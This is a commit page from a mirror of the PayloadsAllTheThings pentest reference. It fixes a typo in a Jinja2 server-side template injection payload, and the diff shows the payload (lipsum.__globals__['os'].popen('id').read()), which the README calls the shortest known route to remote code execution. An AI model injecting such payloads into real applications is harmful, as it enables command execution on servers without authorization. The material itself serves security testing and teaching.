ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-12 01:42:04 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #643 from p0dalirius/patch-2

Browse Source 
SSTI / jinja2 : Removed dot in lipsum.__globals__.["os"]
This commit is contained in:
Swissky 2023-05-09 20:16:05 +02:00 committed by GitHub
commit af4ade2a44
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
Server Side Template Injection/README.md
View File

@ -576,7 +576,7 @@ Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/
With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a path to the `os` module from `lipsum`. This is the shortest payload known to achieve RCE in a Jinja2 template: With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a path to the `os` module from `lipsum`. This is the shortest payload known to achieve RCE in a Jinja2 template:
```python ```python
{{ lipsum.__globals__.["os"].popen('id').read() }} {{ lipsum.__globals__["os"].popen('id').read() }}
``` ```
Source: https://twitter.com/podalirius_/status/1655970628648697860 Source: https://twitter.com/podalirius_/status/1655970628648697860